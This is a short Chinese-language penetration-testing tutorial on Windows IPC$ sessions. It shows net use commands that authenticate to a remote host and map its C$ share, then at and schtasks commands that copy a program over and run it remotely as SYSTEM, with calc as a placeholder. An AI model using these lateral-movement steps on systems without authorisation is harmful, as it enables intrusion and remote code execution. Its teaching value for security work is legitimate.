1、IPC是什么?
IPC是经典的内网渗透的操作之一,其实它本身并不算是一个漏洞,它只是为了方便管理员远程管理而开放的远程网络登录功能,主要是为了让进程之间相互通信。一般情况下,IPC需要139端口或445端口来支持
2、基本操作:
IPC空连接:不需要账户和密码即为空连接
基本上没什么用,大部分都被阻止了
IPC用户连接:输入正确的账户和密码,但会根据账户的权限有不同的反应<br /> net use \\192.168.49.131\IPC$ "password" /user:"username"<br /> <br /> ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284209353-6f598ddb-284f-4f13-a07c-d688afcceabd.png#height=158&id=Pg3oO&margin=%5Bobject%20Object%5D&name=image.png&originHeight=186&originWidth=775&originalType=binary&ratio=1&size=18707&status=done&style=none&width=658)<br /> ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284221934-1e96ebe3-36b5-4deb-9213-1fd170b0082c.png#height=176&id=q9q1q&margin=%5Bobject%20Object%5D&name=image.png&originHeight=182&originWidth=564&originalType=binary&ratio=1&size=14557&status=done&style=none&width=546)
将对方的C盘映射到本地的Z盘<br /> <br />net use z: \\192.168.49.131\c$<br /> ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284250839-cdc9a46a-8849-426a-b2b1-87fef1411251.png#height=302&id=hWbS6&margin=%5Bobject%20Object%5D&name=image.png&originHeight=366&originWidth=588&originalType=binary&ratio=1&size=35738&status=done&style=none&width=485)
复制东西到对端<br /> ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284287044-f54ce3e3-b050-456d-a13f-65d90713eb04.png#height=324&id=k1bq0&margin=%5Bobject%20Object%5D&name=image.png&originHeight=401&originWidth=687&originalType=binary&ratio=1&size=63290&status=done&style=none&width=555)<br />一般可以复制东西到对方后然后使用计划任务运行此程序,<br />at \\192.168.1.1 22:00 c:\\calc.exe<br />at \\192.168.1.1 1 /delete
win7以及win2008以上
schtasks /create /s 192.168.1.1 /tn test /sc onstart /tr c:\calc.bat /ru system /f 添加计划任务
schtasks /run /s 192.168.1.1 /i /tn “test” 运行
schtasks /delete /s /192.168.1.1 /tn “test” 删除
查看<br /> ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284292468-63085ee7-43c8-4b9d-8712-cce38558fffd.png#height=91&id=t4cZn&margin=%5Bobject%20Object%5D&name=image.png&originHeight=93&originWidth=663&originalType=binary&ratio=1&size=7173&status=done&style=none&width=647)
删除IPC连接
net use * /del /y
在对方的电脑查看 net sessions